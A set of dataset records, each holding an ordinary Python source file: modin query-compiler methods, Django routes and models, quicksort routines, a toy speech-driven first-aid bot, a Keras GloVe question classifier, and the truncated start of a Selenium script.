DataFrameDefault.register(pandas.DataFrame.__invert__)(self)\n\n @doc_utils.doc_reduce_agg(\n method=\"mean absolute deviation\",\n params=\"\"\"\n axis : {0, 1}\n skipna : bool\n level : None, default: None\n Serves the compatibility purpose. Always has to be None.\"\"\",\n refer_to=\"mad\",\n )\n def mad(self, axis, skipna, level=None):\n return DataFrameDefault.register(pandas.DataFrame.mad)(\n self, axis=axis, skipna=skipna, level=level\n )\n\n @doc_utils.doc_reduce_agg(\n method=\"unbiased kurtosis\", refer_to=\"kurt\", extra_params=[\"skipna\", \"**kwargs\"]\n )\n def kurt(self, axis, level=None, numeric_only=None, skipna=True, **kwargs):\n return DataFrameDefault.register(pandas.DataFrame.kurt)(\n self, axis=axis, skipna=skipna, numeric_only=numeric_only, **kwargs\n )\n\n sum_min_count = sum\n prod_min_count = prod\n\n @doc_utils.add_refer_to(\"DataFrame.compare\")\n def compare(self, other, align_axis, keep_shape, keep_equal):\n \"\"\"\n Compare data of two QueryCompilers and highlight the difference.\n\n Parameters\n ----------\n other : BaseQueryCompiler\n Query compiler to compare with. Have to be the same shape and the same\n labeling as `self`.\n align_axis : {0, 1}\n keep_shape : bool\n keep_equal : bool\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the differences between `self` and passed\n query compiler.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.compare)(\n self,\n other=other,\n align_axis=align_axis,\n keep_shape=keep_shape,\n keep_equal=keep_equal,\n )\n\n # End of DataFrame methods\n","sub_path":"modin/backends/base/query_compiler.py","file_name":"query_compiler.py","file_ext":"py","file_size_in_byte":142354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620608909","text":"from django.urls import path\nfrom . 
import views\n\napp_name = \"board\"\nurlpatterns=[\n path('', views.index, name=\"index\"),\n path('create', views.create, name=\"create\"),\n path('detail/', views.detail, name=\"detail\"),\n path('delete/', views.delete, name=\"delete\"),\n path('update/', views.update, name=\"update\"),\n path('up//', views.up, name=\"up\"),\n path('create_reply/', views.create_reply, name=\"create_reply\"),\n path('agree//', views.agree, name=\"agree\")\n\n]","sub_path":"board/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276464061","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : 快速排序.py\n# @Time : 9/3/2018 10:36 AM\n# @Author : NusLuoKe\n\n'''\n设要排序的数组是A[0]……A[N-1],首先任意选取一个数据(通常选用数组的第一个数)作为关键数据,\n然后将所有比它小的数都放到它前面,所有比它大的数都放到它后面,这个过程称为一趟快速排序。\n\n一趟快速排序的算法是:\n1)设置两个变量i、j,排序开始的时候:i=0,j=N-1;\n2)以第一个数组元素作为关键数据,赋值给key,即key=A[0];\n3)从j开始向前搜索,即由后开始向前搜索(j--),找到第一个小于key的值A[j],将A[j]和A[i]互换;\n4)从i开始向后搜索,即由前开始向后搜索(i++),找到第一个大于key的A[i],将A[i]和A[j]互换;\n5)重复第3、4步,直到i=j; (3,4步中,没找到符合条件的值,即3中A[j]不小于key,4中A[i]不大于key的时候,\n 改变j、i的值,使得j=j-1,i=i+1,直至找到为止。找到符合条件的值,进行交换的时候i, j指针位置不变。\n 另外,i==j这一过程一定正好是i+或j-完成的时候,此时令循环结束)。\n'''\n\n\nclass Solution(object):\n def quick_sort(self, x):\n '''\n :param x: list object, list to be sorted.\n :return: sorted list\n '''\n\n if len(x) <= 1:\n return x\n\n i = 1\n j = len(x) - 1\n while i != j:\n base = x[0]\n if x[j] < base:\n if x[i] > base:\n x[i], x[j] = x[j], x[i]\n else:\n i += 1\n else:\n j -= 1\n\n x[j], x[0] = x[0], x[j]\n\n return self.quick_sort(x[:j]) + [x[j]] + self.quick_sort(x[j + 1:])\n\n def quick_sort_simple(self, x):\n if len(x) <= 1:\n return x\n\n less = []\n greater = []\n base = x[-1]\n for i in x:\n if i < base:\n less.append(i)\n elif i > base:\n greater.append(i)\n\n return self.quick_sort_simple(less) + [base] + self.quick_sort_simple(greater)\n\n\nif __name__ == '__main__':\n solution = Solution()\n the_input = [6, 1, 2, 7, 9, 3, 4, 5, 10, 8]\n print(solution.quick_sort(the_input))\n print(solution.quick_sort_simple(the_input))\n","sub_path":"done/快速排序.py","file_name":"快速排序.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"556216428","text":"import speech_recognition as sr\r\nimport pyttsx3 \r\nr=sr.Recognizer()\r\nwith sr.Microphone() as source:\r\n print(\"Hey There!\")\r\n print(\"Welcome to First Aid Bot\")\r\n print(\"Tell Us What Happened\")\r\n print(\"We Would be Really Happy To Help You\")\r\n audio=r.listen(source)\r\n print(\"Thanks! Processing in Process.....................\")\r\ndata=r.recognize_google(audio)\r\nif((\"hurt\" in data) or (\"damage\" in data) or (\"blood\" in data) or (\"bleeding\" in data)) :\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\n print(\"You need a bandage and then you will be alright.\")\r\nelif(((\"attack\" in data) or (\"heart attack\" in data) or (\"heart pain\" in data))):\r\n pyttsx3.speak(\"Have the person sit down, rest, and try to keep calm. Loosen any tight clothing. 
Ask if the person takes any chest pain medicine, such as nitroglycerin, for a known heart condition, and help them take it.\")\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\nelif(\"Thanks\" in data) or (\"Thank you\" in data):\r\n print(\"It's was our pleasure to help you!!\")\r\n pyttsx3.speak(\"Don't worry you will be alright just follow below procedures\")\r\n \r\nelse:\r\n pyttsx3.speak(\"Please contact your nearest doctor\")\r\n print(\"---------------------------------------\")\r\n \r\n print(\"---------------------------------------\")\r\n\r\n","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"10519666","text":"from djongo import models\nfrom django import forms\nfrom django.utils.translation import ugettext_lazy as _\nfrom audit_log.models.fields import CreatingUserField, LastUserField\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models.deletion import CASCADE\nfrom random import choices\nfrom master.models import (State,City,ClinicalSetting, HospitalMaster, ClinicalSetting, CaseCategory)\nfrom ckeditor.fields import RichTextField\nfrom django import forms\nfrom dal import autocomplete\n\n\n'''FINALIZED MODELS STARTS''' \n#Address Additional Profile using as embedded field in AdditionalProfile Model\nclass AddressAdditionalProfile(models.Model):\n address_line_1 = models.TextField(blank=True, null=True,verbose_name=_(\"Address Line 1\")) \n address_line_2 = models.TextField(blank=True, null=True,verbose_name=_(\"Address Line 2\"))\n pincode = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Pin Code\"))\n state = models.ForeignKey(State, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n city = models.ForeignKey(City, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"City\"))\n \n def __str__(self):\n return str(self.address_line_1)\n \n class Meta:\n abstract = True\n \nclass AddressAdditionalProfileForm(forms.ModelForm):\n address_line_1 = forms.CharField(label=_(\"Address Line1\"), max_length=300, widget=forms.Textarea(attrs={'class':'form-control','rows':'3', 'cols':'25', 'placeholder':_('Address Line1')})) \n address_line_2 = forms.CharField(label=_(\"Address Line2\"), max_length=300, widget=forms.Textarea(attrs={'class':'form-control','rows':'3', 'cols':'25', 'placeholder':_('Address Line2')})) \n pincode = forms.CharField(label=_('Pincode'),max_length='6', widget=forms.TextInput(attrs={'class':'form-control pincode', 'placeholder':_('Pincode')}))\n state=forms.ModelChoiceField(label=_(\"State\"),\n queryset=State.objects.all(),\n widget=autocomplete.ModelSelect2(url='user_profile:state-autocomplete' ,attrs={'class':'form-control', 'data-placeholder': 'State', 'data-minimum-input-length': 2})\n )\n city=forms.ModelChoiceField(label=_(\"City\"),\n queryset=City.objects.all(),\n widget=autocomplete.ModelSelect2(url='user_profile:city-autocomplete' ,attrs={'class':'form-control', 'data-placeholder': 'City', 'data-minimum-input-length': 2})\n )\n class Meta:\n model = AddressAdditionalProfile\n fields = (\n 'address_line_1', 'address_line_2','pincode','state','city'\n )\n\n#Profile Info Additional Profile using as embedded field in AdditionalProfile Model\nclass ProfileInfoAdditionalProfile(models.Model):\n Profile_dis_CHOICE = ( \n (u'0', u'No'),\n (u'1', u'Opt for Disable'),\n )\n profile_approved_datetime = 
models.DateTimeField(blank=True, null=True, verbose_name=(\"Profile Approved Date Time\"))\n profile_approved_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Approved Remarks\")) \n profile_dis_opt_by_status = models.CharField(max_length=1, default='0',choices=Profile_dis_CHOICE, verbose_name=_(\"Profile Disabled Opt By Status\"))\n profile_dis_opt_by_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Disabled Opt By Remarks\")) \n profile_dis_opt_by_datetime = models.DateTimeField(blank=True, null=True, verbose_name=(\" Profile Disabled Opt By Date Time\"))\n profile_dis_by_remarks = models.TextField(blank=True, null=True,verbose_name=_(\"Profile Disabled By Remarks\")) \n profile_dis_by_datetime = models.DateTimeField(blank=True, null=True, verbose_name=(\" Profile Disabled By Date Time\"))\n profile_approved_by = models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"Profile Approved By\"), related_name = \"ProfileApprovedBy\")\n profile_dis_by= models.ForeignKey(User, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"Profile Disabled By\"), related_name = \"ProfiledisBy\")\n\n def __str__(self):\n return str(self.profile_approved_remarks)\n \n class Meta:\n abstract = True\n \nclass ProfileInfoAdditionalProfileForm(forms.ModelForm):\n class Meta:\n model = ProfileInfoAdditionalProfile\n fields = (\n 'profile_approved_datetime', 'profile_approved_remarks','profile_dis_opt_by_status',\n 'profile_dis_opt_by_remarks','profile_dis_opt_by_datetime','profile_dis_by_remarks',\n 'profile_dis_by_datetime','profile_approved_by','profile_dis_by'\n )\n \n#Additional Profile Model\nclass AdditionalProfile(models.Model):\n _id = models.ObjectIdField()\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"User\"))\n photo = models.ImageField(upload_to='Profile_image/', default='', blank=True, null=True, verbose_name=\"Profile Photo\")\n mobile_no = models.BigIntegerField( verbose_name=_(\"Mobile Number\"))\n addt_mobile_no = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Additional Mobile Number\"))\n address = models.EmbeddedField(\n model_container=AddressAdditionalProfile,\n model_form_class=AddressAdditionalProfileForm,\n )\n profile_info = models.EmbeddedField(\n model_container=ProfileInfoAdditionalProfile,\n model_form_class=ProfileInfoAdditionalProfileForm,\n )\n profile_status = models.CharField(max_length=100, blank=True, null=True, verbose_name=_(\" Profile Status\"))\n \n def __str__(self):\n return self.user.username+' '+self.user.email\n \n class Meta:\n verbose_name = \"Additional Profile\"\n verbose_name_plural = \"Additional Profile\"\n db_table = 'ccrh_user_addtional_profile'\n#Additional Profile Table Ends here\n\n#Creating model for Practical Details Table Starts here\n#when saving the upload path with the name starts here\ndef registartion_document_path_name(instance, filename):\n dir_name = instance.user.username \n return 'Certification Upload/%s/%s' % (dir_name, filename)\n\n#DocumentUploadPractDetails using as Array Field in PractDetails Model\nclass DocumentUploadPractDetails(models.Model):\n document_name = models.CharField(max_length=100, null=True, blank=True, verbose_name=_(\"Document Name\"))\n document_path = models.FileField(upload_to=registartion_document_path_name, null=True, blank=True)\n \n def __str__(self):\n return self.document_name\n \n class Meta:\n abstract = True\n\nclass DocumentUploadPractDetailsForm(forms.ModelForm):\n 
document_name = forms.CharField(label=_(\"Document Name\"), max_length=300, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':_('Document Name')})) \n document_path = forms.FileField(label=_(\"Registration Certificate\"), widget=forms.FileInput(attrs={'class':'form-control'})) \n\n class Meta:\n model = DocumentUploadPractDetails \n fields = (\n 'document_name','document_path'\n )\n \n#CsPractDetails using as Array Field in PractDetails Model\nclass CsPractDetails(models.Model):\n cs = models.ForeignKey(ClinicalSetting, on_delete=models.CASCADE, verbose_name=_(\"Type Of Clinical Setting\"))\n clinic_name = models.CharField(max_length=250, verbose_name=_(\"Clinical name\"))\n clinic_id = models.CharField(max_length=250, verbose_name=_(\"Clinical id\"))\n clinic_address_1 = models.TextField(verbose_name=_(\"Clinical Address 1\"))\n clinic_address_2 = models.TextField(verbose_name=_(\"Clinical Address 2\"))\n city = models.ForeignKey(City, on_delete=models.CASCADE, verbose_name=_(\"City\"))\n state = models.ForeignKey(State, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n pincode = models.BigIntegerField(blank=True, null=True, verbose_name=_(\"Pin Code\"))\n affiliation = models.CharField(blank=True, null=True, max_length=100, verbose_name=_(\"Affiliation\"))\n \n def __str__(self):\n return self.clinic_name\n \n class Meta:\n abstract = True\n\n\nclass CsPractDetailsForm(forms.ModelForm):\n cs = forms.ModelChoiceField(required=True,queryset=ClinicalSetting.objects.all(), empty_label=\"Select Type Of Clinical\", label=_(\"Type Of Clinical Settings\"), widget=forms.Select(attrs={'class':'form-control type_of_clinical'}))\n clinic_name = forms.CharField(required=True, label=_(\"Clinic / Hospital Name\"), widget=forms.TextInput(attrs={'class':'form-control clinical_name','placeholder':_('Please enter 2 or more characters')}))\n clinic_id = forms.CharField(required=True, label=\"Clinical ID\", max_length=300, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':_('Clinical ID')})) \n clinic_address_1 = forms.CharField(required=True, label=\"Clinical/Hospital Address 1\", max_length=300, widget=forms.Textarea(attrs={'class':'form-control address_1','rows':'3', 'cols':'25', 'placeholder':_('Clinical/Hospital Address 1')})) \n clinic_address_2 = forms.CharField(required=True, label=\"Clinical/Hospital Address 2\", max_length=300, widget=forms.Textarea(attrs={'class':'form-control adress_2','rows':'3', 'cols':'25', 'placeholder':_('Clinical/Hospital Address 2')})) \n state = forms.ModelChoiceField(required=True, queryset=State.objects.all(), empty_label=\"Select State\", label=_(\"State\"), widget=forms.Select(attrs={'class':'form-control state','id':'state_id'}))\n city = forms.ModelChoiceField(required=True, queryset=City.objects.all(), empty_label=\"Select City\", label=_(\"City\"), widget=forms.Select(attrs={'class':'form-control city'}))\n pincode = forms.CharField(required=True, label='Pincode',max_length='6', widget=forms.TextInput(attrs={'class':'form-control pincode'}))\n affiliation = forms.CharField(required=False, label='Affiliation',max_length='100', widget=forms.TextInput(attrs={'class':'form-control affiliation', 'placeholder':_('Affiliation')}))\n\n class Meta:\n model = CsPractDetails\n fields = (\n 'cs','clinic_name','clinic_id','clinic_address_1' ,'clinic_address_2','city','state','pincode','affiliation',\n )\n \nclass PractDetails(models.Model):\n _id = models.ObjectIdField()\n user = models.ForeignKey(User, on_delete=models.CASCADE, 
verbose_name=_(\"User\"))\n pract_regis_body = models.CharField(max_length=10, verbose_name=_(\"Registration Body\"))\n pract_reg_no = models.CharField(max_length=50, verbose_name=_(\"Registration Number\"))\n pract_state = models.ForeignKey(State, blank=True, null=True, on_delete=models.CASCADE, verbose_name=_(\"State\"))\n document_name = models.CharField(max_length=100, null=True, blank=True, verbose_name=_(\"Document Name\"))\n document_path = models.FileField(upload_to=registartion_document_path_name, verbose_name=_(\"Registration Document\"), null=True, blank=True)\n\n clinical_setting = models.ArrayField(\n model_container=CsPractDetails,\n model_form_class=CsPractDetailsForm,\n )\n tnc = models.BooleanField(default=False, verbose_name=_(\"Terms & Conditions\"))\n objects = models.DjongoManager()\n\n \n def __str__(self):\n return self.user.username\n \n class Meta:\n verbose_name = \"Practitioner Details\"\n verbose_name_plural = \"Practitioner Details\"\n db_table = 'ccrh_pract_details'\n#Creating model for Practical Details Table Ends here\n\n#Panel User Group Mapping Model Starts here\nclass Category(models.Model):\n category = models.ForeignKey(CaseCategory, on_delete=models.CASCADE, verbose_name=_(\"Category\"))\n\n def __str__(self):\n return self.category.category_name\n \n class Meta:\n abstract = True\n\nclass SupervisorPool(models.Model):\n supervisor = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Supervisor\"))\n \n def __str__(self):\n return self.supervisor.username\n \n class Meta:\n abstract = True\n \nclass ReviewerPool(models.Model):\n reviewer = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Reviewer\"))\n \n def __str__(self):\n return self.reviewer.username\n \n class Meta:\n abstract = True\n \nclass PanelUserGroupMapping(models.Model):\n _id = models.ObjectIdField()\n panel_name = models.CharField(max_length=100, verbose_name=_(\"Panel Name\"))\n category = models.ArrayField(\n model_container=Category,\n )\n supervisor_pool = models.ArrayField(\n model_container=SupervisorPool,\n )\n reviewer_pool = models.ArrayField(\n model_container=ReviewerPool,\n )\n\n def __str__(self):\n return self.panel_name\n \n class Meta:\n verbose_name = \"Panel User Group Mapping\"\n verbose_name_plural = \"Panel User Group Mapping\"\n db_table = 'ccrh_panel_user_group_mapping'\n#Panel User Group Mapping Model Ends here \n\n# #Visitor History Model Starts here\n# class VisitorHistory(models.Model):\n# _id = models.ObjectIdField()\n# IS_ACCESSED_CHOICE = (\n# (u'0', u'No'),\n# (u'1', u'Yes'),\n# )\n# visitor_name = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=_(\"Visitor Name\"))\n# visitor_email = models.CharField(max_length=100, verbose_name=_(\"Visitor Email\"))\n# visitor_mobile = models.BigIntegerField(verbose_name=_(\"Visitor Mobile Number \")) \n# visitor_datetime = models.DateTimeField( verbose_name=_(\"Visitor Date Time\"))\n# visitor_link_unique_code = models.CharField(max_length=100, verbose_name=_(\"Visitor Link Unique Code\"))\n# visitor_link_expiry_datetime = models.DateTimeField( verbose_name=_(\"Visitor Link Expiry Date Time\"))\n# is_accessed = models.CharField(max_length=1, default='0',choices=IS_ACCESSED_CHOICE, verbose_name=_(\"Is Accessed\"))\n# accessed_datetime = models.DateTimeField( verbose_name=_(\"Accessed Date Time\"))\n# \n# class Meta:\n# verbose_name = \"Visitor History\"\n# verbose_name_plural = \"Visitor History\"\n# db_table = 'ccrh_vistor_history'\n# #Visitor History Model Ends 
here\n'''FINALIZED MODELS ENDS''' ","sub_path":"user_profile/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"470633724","text":"import re\r\nimport os\r\nimport sys\r\nimport json\r\nimport numpy as np\r\nfrom sklearn.preprocessing import LabelBinarizer, MultiLabelBinarizer\r\nimport keras\r\nimport tensorflow as tf\r\nfrom keras.layers import Layer\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Dense, Input, Reshape, Concatenate, Flatten\r\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, Embedding, Dropout, LSTM\r\nfrom keras.models import Model, load_model\r\nfrom keras import backend as K\r\nfrom keras.engine import Layer, InputSpec\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras.callbacks import Callback\r\nfrom keras.backend import manual_variable_initialization\r\nimport pickle\r\n\r\nclass SentenceClassifier:\r\n def __init__(self):\r\n self.MAX_SEQUENCE_LENGTH = 55\r\n self.EMBEDDING_DIM = 100\r\n self.LABEL_COUNT = 0\r\n self.WORD_INDEX = dict()\r\n self.LABEL_ENCODER = None\r\n\r\n def clean_str(self, string):\r\n \"\"\"\r\n Cleans each string and convert to lower case.\r\n \"\"\"\r\n string = re.sub(r\"\\'s\", \"\", string)\r\n string = re.sub(r\"\\'ve\", \"\", string)\r\n string = re.sub(r\"n\\'t\", \"n not\", string)\r\n string = re.sub(r\"\\'re\", \"\", string)\r\n string = re.sub(r\"\\'d\", \"\", string)\r\n string = re.sub(r\"\\'ll\", \"\", string)\r\n string = re.sub(r\"\\\\n\", \"\", string)\r\n string = re.sub(r\"[^A-Za-z0-9]\", \" \", string)\r\n string = re.sub(r\"\\s{2,}\", \" \", string)\r\n return string.strip().lower()\r\n\r\n def loader_encoder(self, table, type=\"json\"):\r\n \"\"\"\r\n Load and encode data from dataset.\r\n\r\n type = \"sql\" means get data from MySQL database.\r\n type = \"json\" means get data from .json file.\r\n \"\"\"\r\n\r\n # if type == \"sql\":\r\n # mydb, cursor = self.connect_to_db()\r\n #\r\n # cursor.execute(\"select question from \" + table) # load questions from db\r\n # questions = list(str(x[0]) for x in cursor.fetchall())\r\n #\r\n # cursor.execute(\"select tags from \" + table)\r\n # tags = list(re.split(',\\s*', tag[0]) for tag in cursor.fetchall())\r\n #\r\n # del (mydb)\r\n # del (cursor)\r\n\r\n if type == \"json\":\r\n with open('./data/' + table + '.json', 'r', encoding='utf8') as f:\r\n datastore = json.load(f)\r\n questions = []\r\n tags = []\r\n for row in datastore:\r\n questions.append(self.clean_str(row['question']))\r\n tags.append(row['tags'].split(','))\r\n\r\n if table.lower()=='trec' and os.path.exists('./saved/trec_tokenizer.pkl'):\r\n\r\n with open('./saved/trec_tokenizer.pkl', 'rb') as f:\r\n tokenizer = pickle.load(f)\r\n self.WORD_INDEX = tokenizer.word_index\r\n else:\r\n tokenizer = Tokenizer(lower=True, char_level=False)\r\n tokenizer.fit_on_texts(questions)\r\n self.WORD_INDEX = tokenizer.word_index\r\n\r\n questions_encoded = tokenizer.texts_to_sequences(questions)\r\n questions_encoded_padded = pad_sequences(questions_encoded, maxlen=self.MAX_SEQUENCE_LENGTH, padding='post')\r\n\r\n\r\n for i, ele in enumerate(tags):\r\n for j, tag in enumerate(ele):\r\n if len(tag) == 0 or tag == ',':\r\n del tags[i][j]\r\n\r\n if table.lower()=='trec' and os.path.exists('./saved/trec_label_encoder.pkl'):\r\n with open('./saved/trec_label_encoder.pkl', 'rb') as 
f:\r\n self.LABEL_ENCODER = pickle.load(f)\r\n self.LABEL_COUNT = 6\r\n encoder = self.LABEL_ENCODER\r\n tags_encoded = encoder.fit_transform(tags)\r\n else:\r\n encoder = MultiLabelBinarizer()\r\n encoder.fit(tags)\r\n self.LABEL_ENCODER = encoder\r\n tags_encoded = encoder.fit_transform(tags)\r\n self.LABEL_COUNT = len(tags_encoded[0]) # No. of labels\r\n print(\"\\tUnique Tokens in Training Data: \", len(self.WORD_INDEX))\r\n print(\"\\nNumber of labels: \", self.LABEL_COUNT)\r\n return questions_encoded_padded, tags_encoded\r\n\r\n def load_embeddings(self, EMBED_PATH='./embeddings/glove.6B.100d.txt'):\r\n \"\"\"\r\n Load pre-trained embeddings into memory.\r\n \"\"\"\r\n embeddings_index = {}\r\n try:\r\n \tf = open(EMBED_PATH, encoding='utf-8')\r\n except FileNotFoundError:\r\n \tprint(\"Embeddings missing.\")\r\n \tsys.exit()\r\n for line in f:\r\n values = line.rstrip().rsplit(' ')\r\n word = values[0]\r\n vec = np.asarray(values[1:], dtype='float32')\r\n embeddings_index[word] = vec\r\n f.close()\r\n print(\"\\tNumber of tokens in embeddings file: \", len(embeddings_index))\r\n return embeddings_index\r\n\r\n def create_embedding_matrix(self, embeddings_index):\r\n \"\"\"\r\n Creates an embedding matrix for all the words(vocab) in the training data with shape (vocab, EMBEDDING_DIM).\r\n Out-of-vocab words will be randomly initialized to values between +0.25 and -0.25.\r\n \"\"\"\r\n words_not_found = []\r\n vocab = len(self.WORD_INDEX) + 1\r\n embedding_matrix = np.random.uniform(-0.25, 0.25, size=(vocab, self.EMBEDDING_DIM))\r\n for word, i in self.WORD_INDEX.items():\r\n if i >= vocab:\r\n continue\r\n embedding_vector = embeddings_index.get(word)\r\n if (embedding_vector is not None) and len(embedding_vector) > 0:\r\n embedding_matrix[i] = embedding_vector\r\n else:\r\n words_not_found.append(word)\r\n\r\n print(\"\\tShape of embedding matrix: \", str(embedding_matrix.shape))\r\n print(\"\\tNo. 
of words not found in pre-trained embeddings: \", len(words_not_found))\r\n return embedding_matrix\r\n\r\n def sentence_classifier(self, embedding_matrix, x, y, table, load_saved=1):\r\n \"\"\"\r\n Makes uses of Keras functional API for constructing the model.\r\n\r\n If load_saved=1, THEN load old model, ELSE train new model\r\n \"\"\"\r\n\r\n model_name = table + \".model.h5\"\r\n if load_saved == 1 and os.path.exists('./saved/' + model_name):\r\n\r\n print(\"\\nLoading saved model:\" + model_name )\r\n model = load_model('./saved/' + model_name)\r\n print(\"Model Summary\")\r\n print(model.summary())\r\n\r\n else:\r\n print(\"\\nTraining model...\")\r\n inputs = Input(shape=(self.MAX_SEQUENCE_LENGTH,), dtype='int32')\r\n embedding = Embedding(input_dim=(len(self.WORD_INDEX) + 1), output_dim=self.EMBEDDING_DIM,\r\n weights=[embedding_matrix],\r\n input_length=self.MAX_SEQUENCE_LENGTH, trainable=False)(inputs)\r\n\r\n X = keras.layers.SpatialDropout1D(0.2)(embedding)\r\n\r\n\r\n output = Dense(units=self.LABEL_COUNT, activation='sigmoid')(X)\r\n\r\n model = Model(inputs=inputs, outputs=output, name='question_classifier')\r\n print(\"Model Summary\")\r\n print(model.summary())\r\n\r\n # cbk = OutputObserver(model, self, table)\r\n adam = keras.optimizers.Adam(lr=1e-5, decay=1e-6, epsilon=1e-7)\r\n\r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n model.fit(x, y,\r\n batch_size=200,\r\n epochs=800,\r\n verbose=2,\r\n callbacks=[]) # callbacks=[cbk] to test model on sample sentences at the end of every epoch.\r\n\r\n return model\r\n\r\n def tag_question(self, model, question, graph=None):\r\n question = self.clean_str(question)\r\n print(question)\r\n question_encoded = [[self.WORD_INDEX[w] for w in question.split(' ') if w in self.WORD_INDEX]]\r\n question_encoded_padded = pad_sequences(question_encoded, maxlen=self.MAX_SEQUENCE_LENGTH, padding='post')\r\n predictions = model.predict(question_encoded_padded)\r\n\r\n tags_list = list()\r\n possible_tags = dict()\r\n for i, probability in enumerate(predictions[0]):\r\n if probability >= 0.1:\r\n tags_list.append([self.LABEL_ENCODER.classes_[i], probability])\r\n\r\n tags_list.sort(key=lambda x: int(x[1]), reverse=True)\r\n tags_list = tags_list[:10]\r\n\r\n for ele in tags_list:\r\n possible_tags[ele[0].capitalize()] = str(ele[1])[:4]\r\n\r\n\r\n print(possible_tags)\r\n return possible_tags\r\n\r\n def setup_classifier(self, table=\"trec\", load_saved=1):\r\n keras.backend.clear_session()\r\n print(\"Loading Data Set...\")\r\n x, y = self.loader_encoder(table)\r\n\r\n embeddings_index = self.load_embeddings()\r\n\r\n print(\"\\nGenerating embedding matrix...\")\r\n embedding_matrix = self.create_embedding_matrix(embeddings_index)\r\n\r\n # Loading / Training model\r\n model = self.sentence_classifier(embedding_matrix, x, y, table, load_saved=load_saved)\r\n\r\n return model, embeddings_index\r\n\r\n # def connect_to_db(self):\r\n # mydb = mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"root\", database=\"questiondb\")\r\n # cursor = mydb.cursor()\r\n # return mydb, cursor\r\n\r\n\r\nclass OutputObserver(Callback):\r\n \"\"\"\r\n Used to test model with sample sentences after every epoch, if [cbk] passed as arg to callbacks, in model.fit function.\r\n \"\"\"\r\n\r\n def __init__(self, model, classifier, table):\r\n self.model = model\r\n self.classifier = classifier\r\n self.table = table\r\n\r\n def on_epoch_end(self, epoch, logs={}):\r\n if self.table=='test':\r\n 
self.classifier.tag_question(self.model, \"Is this sensor ghosting, or something else?\")\r\n self.classifier.tag_question(self.model, \"The reason for my pale colored / bad contrast film images?\")\r\n self.classifier.tag_question(self.model, \"Cameras using mirrors instead of lenses to get coloured images?\")\r\n\r\n if self.table=='trec':\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese ?\")\r\n self.classifier.tag_question(self.model, \"How much do fruit cost there in china ?\")\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese ? How much do fruit cost in China ?\")\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese and how much do fruits cost there in china ?\")\r\n self.classifier.tag_question(self.model, \"How To download images from Internet and what's the term for chinese fruits ?\")\r\n self.classifier.tag_question(self.model, \"Where is India located?\")\r\n\r\nif __name__ == '__main__':\r\n classifier = SentenceClassifier()\r\n model, embeddings_index = classifier.setup_classifier('trec') # Setup classifier with trec as default dataset.\r\n","sub_path":"Server/glove_classifier.py","file_name":"glove_classifier.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"278951573","text":"'''\r\nCreated on Aug 21, 2018\r\n\r\n@author: QDoan\r\n'''\r\nimport logging, os, time\r\nfrom selenium import webdriver\r\nfrom mtmf.pages.instructor_home_page import InstructorHomePage\r\nfrom mtmf.pages.instructor_dashboard import InstructorDashboard\r\nfrom mtmf.pages.assignment_editor_page import AssignmentEditor \r\nfrom mtmf.pages import login_page\r\nfrom myutils import utils_files_io\r\n\r\ndef set_homework_quantity():\r\n ''' Function to extract the amount number for homework exercise.\r\n This function works for quizzes too. ''' \r\n \r\n ''' Read list of assignments '''\r\n assignments_list = utils_files_io.read_list_from_file('data/assignments_list.txt')\r\n \r\n for assignment_name in assignments_list:\r\n ''' 1. Go to assignment via dropdown menu, and click on Edit Assignment '''\r\n msg = 'Go to assignment \"{}\" to edit...'.format(assignment_name)\r\n print(msg)\r\n logging.info(' ' + msg)\r\n dashboard = InstructorDashboard(driver)\r\n dashboard.select_assignment_from_dropdown(assignment_name)\r\n dashboard.click_edit_assignment(); time.sleep(1)\r\n \r\n editor = AssignmentEditor(driver)\r\n \r\n ''' 2. Get number of LO's '''\r\n learning_objectives = editor.get_learning_objectives()\r\n print('There are {} LOs'.format(len(learning_objectives)))\r\n \r\n for lo_number in range(1, len(learning_objectives) + 1):\r\n ''' 2a. Click to expand Exercise '''\r\n lo_name = editor.get_lo_name(lo_number)\r\n print(lo_name)\r\n 